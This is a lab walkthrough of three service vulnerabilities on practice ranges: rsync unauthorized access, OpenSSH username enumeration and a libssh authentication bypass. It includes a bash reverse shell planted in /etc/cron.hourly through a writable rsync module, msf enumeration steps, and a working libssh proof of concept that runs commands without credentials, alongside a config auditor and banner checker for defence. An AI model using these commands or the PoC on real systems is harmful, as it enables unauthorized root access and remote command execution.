Service Attack and Defense: Application Protocol rsync Unauthorized Access & ssh Vulnerability Reproduction

Directory

  • Service Attack and Defense – Application Protocol rsync & ssh Vulnerability Reproduction
    • Vulnerability reproduction
      • Improper configuration – unauthorized access – rsync file backup
      • OpenSSH username enumeration vulnerability
      • libssh authentication bypass vulnerability

Service Attack and Defense – Application Protocol rsync & ssh Vulnerability Reproduction

Vulnerability reproduction

Improper configuration – unauthorized access – rsync file backup

rsync default port: 873

rsync is a widely used file synchronization and backup tool on Linux. It transfers files remotely either over its own rsync daemon protocol or tunnelled through ssh.

In daemon mode rsync listens on port 873 by default. If the target runs the rsync daemon and an exported module has no ACL (hosts allow), no authentication (auth users / secrets file) and is not read only, anyone who can reach the port can list the modules and read, and possibly write, the files behind them.

Practice range: vulhub or vulfocus

Reference: rsync unauthorized access

Start the environment:

After the environment is started, use the rsync client to list the modules the daemon exports:

rsync rsync://your-ip:873/
// the range maps the container's port 873 to a random host port (43983 here)
rsync rsync://192.168.100.134:43983

You can view the list of module names:


List the contents of the module:

rsync rsync://your-ip:873/src/
rsync rsync://192.168.100.134:43983/src

The listing shows a Linux root directory, so the module exports the whole filesystem and we can download arbitrary files:

rsync -av rsync://your-ip:873/src/etc/passwd ./
rsync rsync://192.168.100.134:43983/src/etc/passwd ./

Uploading can be tried as well (it only succeeds when the module is not read only):

// upload the passwd file just downloaded into the /src module
rsync ./passwd rsync://192.168.100.134:43983/src

// verify
rsync rsync://192.168.100.134:43983/src

The range environment expired, so it was restarted (the mapped port is now 39525) and the experiment continues.

Reverse shell:

// download the system crontab
rsync -av rsync://192.168.100.134:39525/src/etc/crontab ./

Open the downloaded file and note this line:

It says that at minute 17 of every hour, root changes to / and runs every executable in /etc/cron.hourly via run-parts:

17 * * * * root cd / && run-parts --report /etc/cron.hourly

Create a script file named shell containing a bash reverse shell (192.168.100.146:6666 is the attacker's listener):

#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.100.146/6666 0>&1

Grant execute permission (rsync -a preserves the mode, so the uploaded copy stays executable; run-parts also ignores file names containing a dot, so keep the name plain):

chmod +x shell

Upload the script into /etc/cron.hourly (the module is writable and the daemon has write access to /etc in this range, so the upload lands in the real directory):

rsync -av shell rsync://192.168.100.134:39525/src/etc/cron.hourly


Listen locally:

nc -lvvp 6666

Then wait for the next :17 minute mark; cron runs the script as root and the shell calls back.
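The misconfiguration the walkthrough above relies on, and the module-listing step, as an added example in Python (this is not code from vulhub or from the original post). The rsyncd.conf below is constructed for the example: its [src] module has the same properties as the one in the range, while [backup] shows the settings that close the hole. audit_modules flags every module an anonymous client could read from or write to; list_rsync_modules speaks the minimal rsync daemon handshake (the @RSYNCD greeting, then #list) and returns the module names, which is what `rsync rsync://host:port/` prints. serve_fake_rsync_once is a constructed stand-in daemon so the probe can be exercised offline; against the range, point list_rsync_modules at 192.168.100.134 and the mapped port instead.

```python
import re
import socket
import threading

# Constructed rsyncd.conf for this example. [src] mirrors the exposure in the
# range above (whole filesystem, writable, no auth, no ACL); [backup] is hardened.
SAMPLE_RSYNCD_CONF = """
uid = root
gid = root
use chroot = no

[src]
    path = /
    read only = no
    comment = backup

[backup]
    path = /srv/backup
    read only = yes
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24
"""


def parse_rsyncd_conf(text):
    """Parse rsyncd.conf into {module: {key: value}}; global settings live under ''."""
    sections = {"": {}}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip()
            sections.setdefault(current, {})
        elif "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_modules(text):
    """Return {module: [findings]} for every module an anonymous client could abuse."""
    conf = parse_rsyncd_conf(text)
    report = {}
    for name, opts in conf.items():
        if name == "":
            continue
        eff = {**conf[""], **opts}          # module settings override globals
        findings = []
        if not eff.get("auth users"):
            findings.append("no 'auth users': anonymous access allowed")
        if not eff.get("hosts allow"):
            findings.append("no 'hosts allow': reachable from any source address")
        if eff.get("read only", "yes").lower() in ("no", "false", "0"):
            findings.append("'read only = no': anonymous clients can upload")
        if eff.get("path") == "/":
            findings.append("path is '/': module exports the whole filesystem")
        if findings:
            report[name] = findings
    return report


def list_rsync_modules(host, port, timeout=5.0):
    """Speak the rsync daemon handshake and return the module names '#list' yields."""
    with socket.create_connection((host, port), timeout=timeout) as s, \
            s.makefile("rwb", buffering=0) as f:
        greeting = f.readline()                 # e.g. b"@RSYNCD: 31.0\n"
        if not greeting.startswith(b"@RSYNCD:"):
            raise ValueError("not an rsync daemon: %r" % greeting)
        f.write(b"@RSYNCD: 31.0\n")             # our protocol version
        f.write(b"#list\n")                     # request the module listing
        names = []
        while True:
            line = f.readline()
            if not line or line.startswith(b"@RSYNCD: EXIT"):
                break
            names.append(line.decode(errors="replace").split("\t")[0].strip())
        return names


def serve_fake_rsync_once(modules):
    """Constructed stand-in for rsyncd that answers a single '#list'; returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def handler():
        conn, _ = srv.accept()
        with conn, conn.makefile("rwb", buffering=0) as f:
            f.write(b"@RSYNCD: 31.0\n")
            f.readline()                        # client's version line
            if f.readline().strip() == b"#list":
                for name, comment in modules:
                    f.write(("%-15s\t%s\n" % (name, comment)).encode())
                f.write(b"@RSYNCD: EXIT\n")
        srv.close()

    threading.Thread(target=handler, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    for module, findings in audit_modules(SAMPLE_RSYNCD_CONF).items():
        print("[%s]" % module, *findings, sep="\n  ")
    port = serve_fake_rsync_once([("src", "backup"), ("backup", "")])
    print("modules:", list_rsync_modules("127.0.0.1", port))
```

The audit treats a missing read only as the rsync default (read only = yes), so a module is only reported as writable when the configuration says so explicitly; the fix for the [src] module is the combination shown in [backup]: auth users plus a secrets file, a hosts allow list, and an export path that is not /.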

OpenSSH username enumeration vulnerability

Reference: CVE-2018-15473

OpenSSH before 7.7 has a username enumeration vulnerability (CVE-2018-15473): a malformed authentication request is handled differently depending on whether the username exists, so an attacker can determine whether a given username exists on the target host.

Start the environment:

After the environment is started, run the following on the client and enter the password vulhub to log in to the container:

ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@your-ip -p 20022

A public exploit can be used directly:

exp link: CVE-2018-15473-Exploit

python sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt your-ip

Method two:

The same check can be done with the msf module auxiliary/scanner/ssh/ssh_enumusers:

msfconsole                                   // start msf
search ssh_enumusers                         // find the module
use auxiliary/scanner/ssh/ssh_enumusers      // the numeric index shown by search varies, so use the full path
set rhosts 192.168.100.134
set rport 20022
set user_file "dictionary path"
run

The run reports root, example, vulhub and nobody as existing users.

libssh authentication bypass vulnerability

Reference: libssh server-side authentication bypass vulnerability

libssh is a multi-platform C library that implements the SSHv2 protocol on both the client and server sides. A logic flaw in libssh's server-side state machine lets a client send a MSG_USERAUTH_SUCCESS message (the message the server would normally send to the client) before authentication has succeeded; the server then treats the session as authenticated, so the attacker bypasses authentication and gains access to the target SSH server. Affected: libssh 0.6 and later; fixed in 0.7.6 and 0.8.4.

Start the range environment:

After the environment is started, the service is reachable at your-ip:2222 (account: myuser, password: mypassword).
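A quick version-range check for the two SSH vulnerabilities on this page (CVE-2018-15473 in OpenSSH before 7.7, and CVE-2018-10993 in libssh 0.6 up to the 0.7.6 / 0.8.4 fixes), as an added example in Python that is not part of the original post or of either project. The banners in SAMPLE_BANNERS are constructed, not captured from the ranges. grab_banner reads the identification line from a live server; classify only says whether the advertised version falls inside the affected range. Distributions backport fixes without changing the version string, so "in range" is a reason to run the exploit or PoC above, not a confirmation.

```python
import re
import socket

# Constructed SSH identification strings (not captures from the range hosts).
SAMPLE_BANNERS = {
    "openssh_old": b"SSH-2.0-OpenSSH_7.5\r\n",
    "openssh_new": b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4\r\n",
    "libssh_vuln": b"SSH-2.0-libssh_0.8.1\r\n",
    "libssh_fixed": b"SSH-2.0-libssh_0.8.4\r\n",
}


def parse_banner(banner):
    """Return (software, version_tuple) from an SSH identification line, or None."""
    m = re.match(rb"SSH-2\.0-([A-Za-z]+)[_-]?(\d+(?:\.\d+)*)", banner.strip())
    if not m:
        return None
    software = m.group(1).decode().lower()
    version = tuple(int(x) for x in m.group(2).decode().split("."))
    return software, version


def classify(banner):
    """Say which of the two CVEs the advertised version is in range for."""
    parsed = parse_banner(banner)
    if parsed is None:
        return "unrecognised"
    software, ver = parsed
    if software == "openssh":
        # CVE-2018-15473: username enumeration, fixed in OpenSSH 7.7
        return "CVE-2018-15473 (version in range)" if ver < (7, 7) else "not in range"
    if software == "libssh":
        # CVE-2018-10993: auth bypass, libssh 0.6 and later, fixed in 0.7.6 and 0.8.4
        if (0, 6) <= ver < (0, 7, 6) or (0, 8) <= ver < (0, 8, 4):
            return "CVE-2018-10993 (version in range)"
        return "not in range"
    return "unrecognised"


def grab_banner(host, port, timeout=5.0):
    """Read the server's identification line (either side may send its line first)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"SSH-2.0-banner-check\r\n")
        return s.makefile("rb").readline()


if __name__ == "__main__":
    for label, banner in SAMPLE_BANNERS.items():
        print(label, banner.strip().decode(), "->", classify(banner))
```

Against the ranges on this page the call would be classify(grab_banner("192.168.100.134", 20022)) for the OpenSSH container and classify(grab_banner("192.168.100.134", 2222)) for the libssh one.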

Exploitation:

Reference: CVE-2018-10993

Following the reference, the PoC can be used directly:

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()  # banner and key exchange only, no authentication

        # CVE-2018-10993: send USERAUTH_SUCCESS (normally server -> client) ourselves;
        # a vulnerable libssh server flips its state to "authenticated"
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        # open a session channel and run the command without ever authenticating
        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output + error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

Run the verification:

python libssh_poc.py 192.168.100.134 2222 "id"
python libssh_poc.py 192.168.100.134 2222 "whoami"
python libssh_poc.py 192.168.100.134 2222 "touch /123.txt"
python libssh_poc.py 192.168.100.134 2222 "ls /"

The commands run without any credentials, and the ls / output shows that 123.txt was created, confirming the authentication bypass.